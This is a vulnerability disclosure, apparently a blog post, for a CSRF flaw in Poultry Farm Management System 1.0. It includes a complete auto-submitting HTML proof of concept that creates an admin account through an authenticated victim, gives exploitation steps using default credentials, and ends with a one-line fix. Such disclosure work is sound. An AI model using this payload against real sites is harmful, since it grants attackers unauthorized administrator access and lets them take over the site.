CSRF on Poultry Farm Management System 1.0

Poultry Farm Management System 1.0 suffers from CSRF attack via /Redcock-Farm/farm/userregister.php. Exploiting this issue allows an…

Poultry Farm Management System 1.0 suffers from CSRF attack via /Redcock-Farm/farm/userregister.php. Exploiting this issue allows an attacker to create a user with admin rights by sending a crafter payload to an authenticated user.

Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip

Tested on: Ubuntu 20.04.5 LTS + PHP 7.4.3, Apache 2.4.41


Identification

Let’s open the code and see the root cause.

newuser_from.php is responsible for creating users.

newuser_form.php has no csrf protection

Since there is no CSRF protection, we can create a new user if someone clicks on our payload hosted on our site.


Exploitation

let’s create a HTML form similar to the newuser_form form and populate it with new user values.

GitHub link: https://gist.github.com/gowthamaraj/afc485841bcf227cdc5c71fc16800ebb

PoC HTML:

<html> 
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://20.163.26.136/Redcock-Farm/farm/userregister.php"> 
    <table> 
        <tr> 
            <td>dignity</td> 
            <td><input type="text" value="Admin" name="dignity"></td> 
        </tr> 
        <tr> 
            <td>staffid</td> 
            <td><input type="text" value="1" name="staffid"></td> 
        </tr> 
        <tr> 
            <td>fullname</td> 
            <td><input type="text" value="foxy" name="fullname"></td> 
        </tr> 
        <tr> 
            <td>firstname</td> 
            <td><input type="text" value="purple" name="firstname"></td> 
        </tr> 
        <tr> 
            <td>lastname</td> 
            <td><input type="text" value="foxy" name="lastname"></td> 
        </tr> 
        <tr> 
            <td>mobileno</td> 
            <td><input type="text" value="9000980008" name="mobileno"></td> 
        </tr> 
        <tr> 
            <td>emailid</td> 
            <td><input type="text" value="foxy@gmail.com" name="emailid"></td> 
        </tr> 
        <tr> 
            <td>password</td> 
            <td><input type="text" value="password" name="password"></td> 
        </tr> 
        <tr> 
            <td>confirmpassword</td> 
            <td><input type="text" value="password" name="confirmpassword"></td> 
        </tr> 
        <tr> 
            <td>signup</td> 
            <td><input type="text" value="Register" name="signup"></td> 
        </tr> 
    </table><input type="submit" value="http://20.163.26.136/Redcock-Farm/farm/userregister.php"> 
</form> 
<script> 
    document.forms[0].submit(); 
</script> 
 
</html>

change the URLs in the PoC to your target website URL.

I hosted the HTML page at http://20.163.26.136/Redcock-Farm/poc.html for testing. However, you can save the file locally and visit it to test.

Let’s log in to the website using the default credentials provided to us.

Username : ndbhalerao91@gmail.com 
Password : admin

Once logged in, visit the poc.html hosted by you.

The user is successfully created.

we can log in to the website as admin using the user we just created

Username: foxy@gmail.com 
Password: password

Remediation

  1. Use of CSRF tokens